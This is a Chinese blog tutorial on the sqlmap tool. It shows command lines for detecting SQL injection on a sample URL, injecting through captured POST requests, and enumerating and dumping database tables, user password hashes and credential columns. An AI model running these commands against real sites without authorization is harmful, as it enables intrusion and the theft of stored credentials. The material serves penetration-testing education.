sqlmap使用教程

安装方法

你可以点击这里下载最新的tar打包的源代码或者点击这里下载最新的zip打包的源代码。

推荐你从Git的仓库获取最新的源代码:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap可以运行在Python 2.6.x2.7.x版本的任何平台上

使用方法

通过如下命令可以查看基本的用法及命令行参数:

python sqlmap.py -h

通过如下的命令可以查看所有的用法及命令行参数:

python sqlmap.py -hh

检测注入

基本格式

sqlmap -u “http://www.vuln.cn/post.php?id=1”

默认使用level1检测全部数据库类型

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)

从post数据包中注入

可以使用burpsuite或者temperdata等工具来抓取post包

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql    指定username参数

注入成功后

获取网站基本信息

查询数据库的基本信息

sqlmap -u “http://www.vuln.cn/post.php?id=1” 

查询当前网站的数据库

sqlmap -u “http://www.vuln.cn/post.php?id=1” --current-db

查询表名

sqlmap -u “http://www.vuln.cn/post.php?id=1” --current-db --tables -D 库名

查询test数据库中有哪些表

sqlmap -u “http://www.vuln.cn/post.php?id=1” -T 表名 --columns

dump出字段username与password中的数据

sqlmap -u “http://www.vuln.cn/post.php?id=1”  -T 表名 --dump

Enumeration(枚举):

–current-user 检索数据库管理系统当前用户

–current-db 检索数据库管理系统当前数据库

–users 枚举数据库管理系统用户

–passwords 枚举数据库管理系统用户密码哈希

–dbs 枚举数据库管理系统数据库

-D DBname 要进行枚举的指定数据库名

-T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump 转储数据库管理系统的数据库中的表项

–dump-all 转储所有的DBMS数据库表中的条目

-C COL 要进行枚举的数据库列

-U USER 用来进行枚举的数据库用户

–level=LEVEL 执行测试的等级(1-5,默认为1)

–forms 对目标URL的解析和测试形式(万能密码可以使用此参数)

附上大佬的博客http://www.vuln.cn/1992

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 13,541评论 2 22
  • sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功...
    道书简阅读 5,344评论 0 0
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,397评论 0 5
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 136,183评论 19 139
  • 如果说生活就像天气一样,那么狂风暴雨,电闪雷鸣,艳阳高照,秋风呼啸,冬日温暖都会有。我们总说,要在心中预留一块地方...
    Yc_笔迹阅读 3,388评论 0 0

友情链接更多精彩内容